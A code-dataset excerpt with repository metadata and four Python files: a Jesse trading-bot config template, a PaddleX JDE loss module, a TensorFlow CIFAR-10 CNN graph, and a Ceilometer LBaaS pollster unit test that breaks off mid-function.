| column | type / range |
|---|---|
| hexsha | string, length 40–40 |
| size | int64, 4–1.02M |
| ext | string, 8 classes |
| lang | string, 1 class |
| max_stars_repo_path | string, length 4–209 |
| max_stars_repo_name | string, length 5–121 |
| max_stars_repo_head_hexsha | string, length 40–40 |
| max_stars_repo_licenses | list, length 1–10 |
| max_stars_count | int64, 1–191k ⌀ |
| max_stars_repo_stars_event_min_datetime | string, length 24–24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string, length 24–24 ⌀ |
| max_issues_repo_path | string, length 4–209 |
| max_issues_repo_name | string, length 5–121 |
| max_issues_repo_head_hexsha | string, length 40–40 |
| max_issues_repo_licenses | list, length 1–10 |
| max_issues_count | int64, 1–67k ⌀ |
| max_issues_repo_issues_event_min_datetime | string, length 24–24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string, length 24–24 ⌀ |
| max_forks_repo_path | string, length 4–209 |
| max_forks_repo_name | string, length 5–121 |
| max_forks_repo_head_hexsha | string, length 40–40 |
| max_forks_repo_licenses | list, length 1–10 |
| max_forks_count | int64, 1–105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string, length 24–24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string, length 24–24 ⌀ |
| content | string, length 4–1.02M |
| avg_line_length | float64, 1.07–66.1k |
| max_line_length | int64, 4–266k |
| alphanum_fraction | float64, 0.01–1 |
hexsha: ff1e63bfe9d1089667daed1c4cbb385d5f6c2ed2 | size: 6,707 | ext: py | lang: Python
max_stars_repo_path: jesse/services/project_maker/project_template/config.py | max_stars_repo_name: noenfugler/jesse | max_stars_repo_head_hexsha: 217a3168620a755c1a9576d9deb27105db7dccf8 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2021-03-25T09:25:49.000Z | max_stars_repo_stars_event_max_datetime: 2021-03-25T09:25:49.000Z
max_issues_repo_path: jesse/services/project_maker/project_template/config.py | max_issues_repo_name: noenfugler/jesse | max_issues_repo_head_hexsha: 217a3168620a755c1a9576d9deb27105db7dccf8 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: jesse/services/project_maker/project_template/config.py | max_forks_repo_name: noenfugler/jesse | max_forks_repo_head_hexsha: 217a3168620a755c1a9576d9deb27105db7dccf8 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2021-09-28T16:23:40.000Z | max_forks_repo_forks_event_max_datetime: 2021-09-28T16:23:40.000Z
content:
```python
config = {
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PostgreSQL Database
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# PostgreSQL is used as the database to store data such as candles.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'databases': {
'postgres_host': '127.0.0.1',
'postgres_name': 'jesse_db',
'postgres_port': 5432,
'postgres_username': 'jesse_user',
'postgres_password': 'password',
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Caching
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# In some cases such as loading candles in the backtest mode, a
# caching mechanism is used to make further loadings faster.
# Valid options (so far) are: 'pickle', None
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'caching': {
'driver': 'pickle'
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Exchanges
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below values are used for exchanges.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'exchanges': {
# https://www.bitfinex.com
'Bitfinex': {
'fee': 0.002,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USD',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
{'asset': 'USD', 'balance': 10_000},
{'asset': 'BTC', 'balance': 0},
],
},
# https://www.binance.com
'Binance': {
'fee': 0.001,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USDT',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
{'asset': 'BTC', 'balance': 0},
],
},
# https://www.binance.com
'Binance Futures': {
'fee': 0.0004,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USDT',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
],
},
# https://testnet.binancefuture.com
'Testnet Binance Futures': {
'fee': 0.0004,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USDT',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
],
},
# https://pro.coinbase.com
'Coinbase': {
'fee': 0.005,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USD',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
{'asset': 'USD', 'balance': 10_000},
{'asset': 'BTC', 'balance': 0},
],
},
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Logging
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are used to filter out the extra logging
    # info that is displayed when the "--debug" flag is enabled.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'logging': {
'order_submission': True,
'order_cancellation': True,
'order_execution': True,
'position_opened': True,
'position_increased': True,
'position_reduced': True,
'position_closed': True,
'shorter_period_candles': False,
'trading_candles': True,
'balance_update': True,
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Metrics
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are used to set the metrics
# that are displayed after a backtest.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'metrics': {
'sharpe_ratio': True,
'calmar_ratio': False,
'sortino_ratio': False,
'omega_ratio': False,
'winning_streak': False,
'losing_streak': False,
'largest_losing_trade': False,
'largest_winning_trade': False,
'total_winning_trades': False,
'total_losing_trades': False,
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Optimize mode
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are related to the optimize mode
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'optimization': {
# sharpe, calmar, sortino, omega
'ratio': 'sharpe',
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Data
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are related to the data
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'data': {
# The minimum number of warmup candles that is loaded before each session.
'warmup_candles_num': 240,
}
}
```
avg_line_length: 33.873737 | max_line_length: 82 | alphanum_fraction: 0.391979
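A config dict in this shape is just nested lookups at runtime. The sketch below is illustrative only: the `exchange_fee` helper and the sample lookups are hypothetical and not part of the Jesse project template above.

```python
# Hypothetical helper (not part of the Jesse template above): read per-exchange
# settings out of a nested config dict shaped like config.py.
def exchange_fee(config: dict, exchange: str) -> float:
    """Return the trading fee configured for an exchange, defaulting to 0.0."""
    return config.get('exchanges', {}).get(exchange, {}).get('fee', 0.0)

sample_config = {
    'exchanges': {
        'Binance Futures': {'fee': 0.0004, 'futures_leverage': 1},
    },
}

print(exchange_fee(sample_config, 'Binance Futures'))  # 0.0004
print(exchange_fee(sample_config, 'Kraken'))           # 0.0 (missing keys fall back safely)
```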
hexsha: ebab252286552ce06263d8987646f934cd7eea9a | size: 7,153 | ext: py | lang: Python
max_stars_repo_path: paddlex/ppdet/modeling/losses/jde_loss.py | max_stars_repo_name: MichaelZhero/PaddleX | max_stars_repo_head_hexsha: bedaa2a1cbefc9078cc00faa10dd4b9de655b1e7 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2021-11-12T03:17:02.000Z | max_stars_repo_stars_event_max_datetime: 2021-11-12T03:17:02.000Z
max_issues_repo_path: paddlex/ppdet/modeling/losses/jde_loss.py | max_issues_repo_name: MichaelZhero/PaddleX | max_issues_repo_head_hexsha: bedaa2a1cbefc9078cc00faa10dd4b9de655b1e7 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: paddlex/ppdet/modeling/losses/jde_loss.py | max_forks_repo_name: MichaelZhero/PaddleX | max_forks_repo_head_hexsha: bedaa2a1cbefc9078cc00faa10dd4b9de655b1e7 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddlex.ppdet.core.workspace import register
__all__ = ['JDEDetectionLoss', 'JDEEmbeddingLoss', 'JDELoss']
@register
class JDEDetectionLoss(nn.Layer):
__shared__ = ['num_classes']
def __init__(self, num_classes=1):
super(JDEDetectionLoss, self).__init__()
self.num_classes = num_classes
def det_loss(self, p_det, anchor, t_conf, t_box):
pshape = paddle.shape(p_det)
pshape.stop_gradient = True
nB, nGh, nGw = pshape[0], pshape[-2], pshape[-1]
nA = len(anchor)
p_det = paddle.reshape(
p_det, [nB, nA, self.num_classes + 5, nGh, nGw]).transpose(
(0, 1, 3, 4, 2))
# 1. loss_conf: cross_entropy
p_conf = p_det[:, :, :, :, 4:6]
p_conf_flatten = paddle.reshape(p_conf, [-1, 2])
t_conf_flatten = t_conf.flatten()
t_conf_flatten = paddle.cast(t_conf_flatten, dtype="int64")
t_conf_flatten.stop_gradient = True
loss_conf = F.cross_entropy(
p_conf_flatten, t_conf_flatten, ignore_index=-1, reduction='mean')
loss_conf.stop_gradient = False
# 2. loss_box: smooth_l1_loss
p_box = p_det[:, :, :, :, :4]
p_box_flatten = paddle.reshape(p_box, [-1, 4])
t_box_flatten = paddle.reshape(t_box, [-1, 4])
fg_inds = paddle.nonzero(t_conf_flatten > 0).flatten()
if fg_inds.numel() > 0:
reg_delta = paddle.gather(p_box_flatten, fg_inds)
reg_target = paddle.gather(t_box_flatten, fg_inds)
else:
reg_delta = paddle.to_tensor([0, 0, 0, 0], dtype='float32')
reg_delta.stop_gradient = False
reg_target = paddle.to_tensor([0, 0, 0, 0], dtype='float32')
reg_target.stop_gradient = True
loss_box = F.smooth_l1_loss(
reg_delta, reg_target, reduction='mean', delta=1.0)
loss_box.stop_gradient = False
return loss_conf, loss_box
def forward(self, det_outs, targets, anchors):
"""
Args:
det_outs (list[Tensor]): output from detection head, each one
is a 4-D Tensor with shape [N, C, H, W].
targets (dict): contains 'im_id', 'gt_bbox', 'gt_ide', 'image',
'im_shape', 'scale_factor' and 'tbox', 'tconf', 'tide' of
each FPN level.
anchors (list[list]): anchor setting of JDE model, N row M col, N is
the anchor levels(FPN levels), M is the anchor scales each
level.
"""
assert len(det_outs) == len(anchors)
loss_confs = []
loss_boxes = []
for i, (p_det, anchor) in enumerate(zip(det_outs, anchors)):
t_conf = targets['tconf{}'.format(i)]
t_box = targets['tbox{}'.format(i)]
loss_conf, loss_box = self.det_loss(p_det, anchor, t_conf, t_box)
loss_confs.append(loss_conf)
loss_boxes.append(loss_box)
return {'loss_confs': loss_confs, 'loss_boxes': loss_boxes}
@register
class JDEEmbeddingLoss(nn.Layer):
def __init__(self, ):
super(JDEEmbeddingLoss, self).__init__()
self.phony = self.create_parameter(shape=[1], dtype="float32")
def emb_loss(self, p_ide, t_conf, t_ide, emb_scale, classifier):
emb_dim = p_ide.shape[1]
p_ide = p_ide.transpose((0, 2, 3, 1))
p_ide_flatten = paddle.reshape(p_ide, [-1, emb_dim])
mask = t_conf > 0
mask = paddle.cast(mask, dtype="int64")
mask.stop_gradient = True
emb_mask = mask.max(1).flatten()
emb_mask_inds = paddle.nonzero(emb_mask > 0).flatten()
emb_mask_inds.stop_gradient = True
# use max(1) to decide the id, TODO: more reseanable strategy
t_ide_flatten = t_ide.max(1).flatten()
t_ide_flatten = paddle.cast(t_ide_flatten, dtype="int64")
valid_inds = paddle.nonzero(t_ide_flatten != -1).flatten()
if emb_mask_inds.numel() == 0 or valid_inds.numel() == 0:
# loss_ide = paddle.to_tensor([0]) # will be error in gradient backward
loss_ide = self.phony * 0 # todo
else:
embedding = paddle.gather(p_ide_flatten, emb_mask_inds)
embedding = emb_scale * F.normalize(embedding)
logits = classifier(embedding)
ide_target = paddle.gather(t_ide_flatten, emb_mask_inds)
loss_ide = F.cross_entropy(
logits, ide_target, ignore_index=-1, reduction='mean')
loss_ide.stop_gradient = False
return loss_ide
def forward(self, ide_outs, targets, emb_scale, classifier):
loss_ides = []
for i, p_ide in enumerate(ide_outs):
t_conf = targets['tconf{}'.format(i)]
t_ide = targets['tide{}'.format(i)]
loss_ide = self.emb_loss(p_ide, t_conf, t_ide, emb_scale,
classifier)
loss_ides.append(loss_ide)
return loss_ides
@register
class JDELoss(nn.Layer):
def __init__(self):
super(JDELoss, self).__init__()
def forward(self, loss_confs, loss_boxes, loss_ides, loss_params_cls,
loss_params_reg, loss_params_ide, targets):
assert len(loss_confs) == len(loss_boxes) == len(loss_ides)
assert len(loss_params_cls) == len(loss_params_reg) == len(
loss_params_ide)
assert len(loss_confs) == len(loss_params_cls)
batchsize = targets['gt_bbox'].shape[0]
nTargets = paddle.nonzero(paddle.sum(targets['gt_bbox'],
axis=2)).shape[0] / batchsize
nTargets = paddle.to_tensor(nTargets, dtype='float32')
nTargets.stop_gradient = True
jde_losses = []
for i, (loss_conf, loss_box, loss_ide, l_conf_p, l_box_p,
l_ide_p) in enumerate(
zip(loss_confs, loss_boxes, loss_ides, loss_params_cls,
loss_params_reg, loss_params_ide)):
jde_loss = l_conf_p(loss_conf) + l_box_p(loss_box) + l_ide_p(
loss_ide)
jde_losses.append(jde_loss)
loss_all = {
"loss_conf": sum(loss_confs),
"loss_box": sum(loss_boxes),
"loss_ide": sum(loss_ides),
"loss": sum(jde_losses),
"nTargets": nTargets,
}
return loss_all
```
avg_line_length: 39.087432 | max_line_length: 83 | alphanum_fraction: 0.614008
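The heart of `det_loss` above is the foreground-masking step: only grid cells with positive target confidence contribute to the box-regression loss. Here is a small NumPy sketch of that pattern on already-flattened arrays; it mirrors the logic but is not PaddleX code, and the toy shapes are assumptions.

```python
import numpy as np

# Toy flattened targets (assumed shapes): 1 = foreground, 0 = background, -1 = ignore.
t_conf = np.array([0, 1, -1, 1, 0])
p_box = np.random.randn(5, 4).astype(np.float32)   # predicted box deltas
t_box = np.random.randn(5, 4).astype(np.float32)   # target box deltas

# Same selection det_loss performs with paddle.nonzero(...).flatten() + paddle.gather.
fg_inds = np.nonzero(t_conf > 0)[0]
reg_delta, reg_target = p_box[fg_inds], t_box[fg_inds]

# Smooth-L1 (Huber) loss with delta=1.0, averaged over foreground cells only.
diff = np.abs(reg_delta - reg_target)
loss_box = np.where(diff < 1.0, 0.5 * diff ** 2, diff - 0.5).mean()
print(fg_inds, loss_box)
```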
hexsha: e7e4b5a35b0a9bea027958ef4ef96d413a1c2878 | size: 5,931 | ext: py | lang: Python
max_stars_repo_path: graph.py | max_stars_repo_name: mahendrakariya/neuralnet_cifar10 | max_stars_repo_head_hexsha: d6f4f84324e15b9527e47f7f4c5a900850d07989 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: graph.py | max_issues_repo_name: mahendrakariya/neuralnet_cifar10 | max_issues_repo_head_hexsha: d6f4f84324e15b9527e47f7f4c5a900850d07989 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: graph.py | max_forks_repo_name: mahendrakariya/neuralnet_cifar10 | max_forks_repo_head_hexsha: d6f4f84324e15b9527e47f7f4c5a900850d07989 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
import tensorflow as tf
BATCH_SIZE = 128
HIDDEN_SIZE = 200
HIDDEN_SIZE_2 = HIDDEN_SIZE // 2
INITIAL_LEARNING_RATE = 0.0001
DECAY_STEPS = 3438 # 4560 #3438 (382*9)
LEARNING_RATE_DECAY_FACTOR = 0.1
MOVING_AVERAGE_DECAY = 0.9999
def inference(images):
with tf.variable_scope('conv1') as scope:
kernel = tf.get_variable("weights1", shape=[5, 5, 3, 64],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', [64], initializer=tf.constant_initializer(0.0))
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias)
tf.histogram_summary("conv1_activations", conv1)
tf.scalar_summary("conv1_sparsity", tf.nn.zero_fraction(conv1))
tf.scalar_summary("conv1_weights", tf.reduce_mean(kernel))
# pool 1
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
pool1 = tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
pool1 = tf.nn.dropout(pool1, 0.4)
with tf.variable_scope('conv2') as scope:
kernel = tf.get_variable("weights2", shape=[5, 5, 64, 128],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', [128], initializer=tf.constant_initializer(0.1))
bias = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(bias)
tf.histogram_summary("conv2_activations", conv2)
tf.scalar_summary("conv2_sparsity", tf.nn.zero_fraction(conv2))
tf.scalar_summary("conv2_weights", tf.reduce_mean(kernel))
# pool 2
pool2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
pool2 = tf.nn.dropout(pool2, 0.6)
# local 3
with tf.variable_scope('local3') as scope:
reshape = tf.reshape(pool2, [BATCH_SIZE, -1])
dim = reshape.get_shape()[1].value
weights = tf.get_variable("weights3", [dim, HIDDEN_SIZE], initializer=tf.contrib.layers.xavier_initializer())
biases = tf.get_variable('biases', [HIDDEN_SIZE], initializer=tf.constant_initializer(0.1))
local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases)
tf.histogram_summary("local3_activations", local3)
tf.scalar_summary("local3_sparsity", tf.nn.zero_fraction(local3))
tf.scalar_summary("local3_weights", tf.reduce_mean(weights))
# local 4
with tf.variable_scope('local4') as scope:
weights = tf.get_variable("weights4", [HIDDEN_SIZE, HIDDEN_SIZE_2],
initializer=tf.contrib.layers.xavier_initializer())
biases = tf.get_variable('biases', [HIDDEN_SIZE_2], initializer=tf.constant_initializer(0.1))
local4 = tf.nn.relu(tf.matmul(local3, weights) + biases)
tf.histogram_summary("local4_activations", local4)
tf.scalar_summary("local4_sparsity", tf.nn.zero_fraction(local4))
tf.scalar_summary("local4_weights", tf.reduce_mean(weights))
# softmax
with tf.variable_scope('softmax') as scope:
weights = tf.Variable(tf.truncated_normal([HIDDEN_SIZE_2, 10], stddev=1 / HIDDEN_SIZE_2))
biases = tf.get_variable('biases', [10], initializer=tf.constant_initializer(0.0))
softmax_linear = tf.matmul(local4, weights) + biases
tf.histogram_summary("softmax_activations", softmax_linear)
tf.scalar_summary("softmax_weights", tf.reduce_mean(weights))
return softmax_linear
def _add_loss_summaries(total_loss):
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
losses = tf.get_collection('losses')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.scalar_summary(l.op.name + ' (raw)', l)
tf.scalar_summary(l.op.name, loss_averages.average(l))
return loss_averages_op
def loss(logits, labels):
labels = tf.cast(labels, tf.int64)
xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels, name='xentropy')
xentropy_mean = tf.reduce_mean(xentropy, name='xentropy_mean')
tf.add_to_collection('losses', xentropy_mean)
return tf.add_n(tf.get_collection('losses'), name='total_loss')
def train(total_loss, global_step):
lr = tf.train.exponential_decay(INITIAL_LEARNING_RATE, global_step, DECAY_STEPS, LEARNING_RATE_DECAY_FACTOR,
staircase=True)
tf.scalar_summary('learning_rate', lr)
loss_averages_op = _add_loss_summaries(total_loss)
with tf.control_dependencies([loss_averages_op]):
opt = tf.train.AdamOptimizer(lr)
grads = opt.compute_gradients(total_loss)
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
for grad, var in grads:
if grad is not None:
tf.histogram_summary(var.op.name + '/gradients', grad)
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
train_op = tf.no_op(name='train')
return train_op
def evaluate(logits, labels):
correct = tf.nn.in_top_k(logits, labels, 1)
return tf.reduce_sum(tf.cast(correct, tf.int32))
def _leaky_relu(x, alpha):
return tf.maximum(alpha*x, x)
```
avg_line_length: 42.669065 | max_line_length: 117 | alphanum_fraction: 0.683359
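The schedule passed to `tf.train.exponential_decay` in `train` drops the learning rate by `LEARNING_RATE_DECAY_FACTOR` every `DECAY_STEPS` steps, because `staircase=True` truncates the exponent to an integer. A pure-Python re-computation of that formula, for illustration only:

```python
# Staircase exponential decay, matching the constants used in graph.py above.
INITIAL_LEARNING_RATE = 0.0001
DECAY_STEPS = 3438
LEARNING_RATE_DECAY_FACTOR = 0.1

def staircase_lr(global_step: int) -> float:
    # With staircase=True the exponent is integer division, so the rate falls in steps.
    return INITIAL_LEARNING_RATE * LEARNING_RATE_DECAY_FACTOR ** (global_step // DECAY_STEPS)

for step in (0, 3437, 3438, 6876):
    print(step, staircase_lr(step))  # 1e-04, 1e-04, 1e-05, 1e-06
```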
hexsha: 82b331e15079ea0bfece29e043f5d39846bcefbe | size: 21,664 | ext: py | lang: Python
max_stars_repo_path: ceilometer/tests/unit/network/services/test_lbaas.py | max_stars_repo_name: andymcc/ceilometer | max_stars_repo_head_hexsha: fa3b047eb17152b30829eadd9220f12ca9949b4f | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: ceilometer/tests/unit/network/services/test_lbaas.py | max_issues_repo_name: andymcc/ceilometer | max_issues_repo_head_hexsha: fa3b047eb17152b30829eadd9220f12ca9949b4f | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: ceilometer/tests/unit/network/services/test_lbaas.py | max_forks_repo_name: andymcc/ceilometer | max_forks_repo_head_hexsha: fa3b047eb17152b30829eadd9220f12ca9949b4f | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
```python
#
# Copyright 2014 Cisco Systems,Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import fixture as fixture_config
from oslotest import base
from oslotest import mockpatch
from ceilometer.agent import manager
from ceilometer.agent import plugin_base
from ceilometer.network.services import discovery
from ceilometer.network.services import lbaas
class _BaseTestLBPollster(base.BaseTestCase):
@mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
def setUp(self):
super(_BaseTestLBPollster, self).setUp()
self.addCleanup(mock.patch.stopall)
self.CONF = self.useFixture(fixture_config.Config()).conf
self.manager = manager.AgentManager(0, self.CONF)
self.CONF.set_override('neutron_lbaas_version',
'v1',
group='service_types')
plugin_base._get_keystone = mock.Mock()
catalog = (plugin_base._get_keystone.session.auth.get_access.
return_value.service_catalog)
catalog.get_endpoints = mock.MagicMock(
return_value={'network': mock.ANY})
class TestLBPoolPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBPoolPollster, self).setUp()
self.pollster = lbaas.LBPoolPollster(self.CONF)
fake_pools = self.fake_get_pools()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'pool_get_all',
return_value=fake_pools))
@staticmethod
def fake_get_pools():
return [{'status': 'ACTIVE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'INACTIVE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb02',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'PENDING_CREATE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'fe7rad36-437d-4c84-aee1-186027d3bdcd',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb03',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'UNKNOWN',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'fe7rad36-437d-4c84-aee1-186027d3bdcd',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb03',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'error',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'fe7rad36-437d-4c84-aee1-186027d3bdcd',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb_error',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
]
def test_pool_get_samples(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_pools()))
self.assertEqual(4, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_pools()[0][field],
samples[0].resource_metadata[field])
def test_pool_volume(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_pools()))
self.assertEqual(1, samples[0].volume)
self.assertEqual(0, samples[1].volume)
self.assertEqual(2, samples[2].volume)
def test_get_pool_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_pools()))
self.assertEqual(set(['network.services.lb.pool']),
set([s.name for s in samples]))
def test_pool_discovery(self):
discovered_pools = discovery.LBPoolsDiscovery(
